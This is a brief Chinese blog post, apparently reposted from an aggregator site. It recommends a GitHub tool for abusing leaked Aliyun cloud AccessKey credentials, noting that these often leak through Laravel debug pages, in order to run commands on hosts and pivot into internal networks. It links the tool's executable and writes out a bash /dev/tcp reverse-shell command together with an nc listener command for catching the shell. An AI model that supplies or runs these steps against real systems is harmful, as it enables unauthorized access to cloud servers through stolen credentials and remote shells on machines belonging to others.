1、簡介

在日常滲透過程中我們經(jīng)常遇到信息泄露出ALIYUN_ACCESSKEYID與ALIYUN_ACCESSKEYSECRET（阿里云API?key），特別是laravel框架得debug信息。APP中也會(huì)泄露這些信息.通過這款利用工具我們可以進(jìn)行命令執(zhí)行獲取到shell然后進(jìn)行內(nèi)網(wǎng)滲透。

具體的github地址如下:

https://github.com/mrknow001/aliyun-accesskey-Tools

exe文件下載地址:

https://github.com/mrknow001/aliyun-accesskey-Tools/releases/download/1.0/Aliyun-.AK.Tools.exe

?

工具截圖如下:

?

可在命令輸入處輸入反彈shell的代碼。

bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1

?

自己的機(jī)器執(zhí)行:

nc -lvvp 端口??

總結(jié)

以上是生活随笔為你收集整理的【推荐】阿里云主机accesskey利用工具的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。